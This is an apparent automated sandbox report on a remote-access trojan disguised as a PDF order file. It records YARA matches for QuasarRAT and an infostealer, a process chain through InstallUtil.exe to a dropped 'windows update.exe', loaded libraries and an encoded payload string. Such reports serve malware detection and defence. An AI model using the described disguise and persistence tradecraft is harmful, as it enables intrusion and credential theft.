                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exeBinary or memory string: OriginalFilenameLhohepjghy.exe6 vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: Order88983273293729387293828PDF.exe, -.csBase64 encoded string: 'Lxg7aNd9UjMtet51HxUhc9w+PRI7ed9yEBhzW9dkOQ88bstRDxItcdB8BVovecZPOhQkcPxxEQRzc8JPNQ8tbcdxEAg8ZYl3GRUXUNd+GxUgJ/V1CDUxbNdWDg4lVNN+GA0tJ9V1CD4Gfd91RygmeNdoMwdzTtdxGDI8btt+G1oJeNYrGwQ8Q+J/Dwg8dd1+RwYtaO1TCRM6edxkOA4lfdt+RzItaPZxCABzKYsgRVoJb8F1EQMkZeF1DhctbolDFQw4cNdRDxItcdB8BSQwbN5/DgQ6J9BxHgQkat8rDwwnd9dkGRI8'
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@10/6@1/1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\SubDirJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3302836a-f2f9-4646-981e-42b54ed610dd
                  Source: Order88983273293729387293828PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Order88983273293729387293828PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 * FROM {0};
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE ROWID = last_insert_rowid();
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SELECT @countGroupBy AS [countGroupBy], @count AS [count]PDELETE FROM @(Model.TemporaryTableName);RDELETE FROM @@(Model.TemporaryTableName);
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT [PK_@(Model.TemporaryTableNamePK)] PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );-Ambiguous invocation of indexer in type '{0}'
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoin)) OR ROWID = last_insert_rowid();
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT * FROM {0} LIMIT 0;
                  Source: Order88983273293729387293828PDF.exeReversingLabs: Detection: 36%
                  Source: unknownProcess created: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Order88983273293729387293828PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Order88983273293729387293828PDF.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: Order88983273293729387293828PDF.exeStatic file information: File size 1484800 > 1048576
                  Source: Order88983273293729387293828PDF.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x169e00
                  Source: Order88983273293729387293828PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: Order88983273293729387293828PDF.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
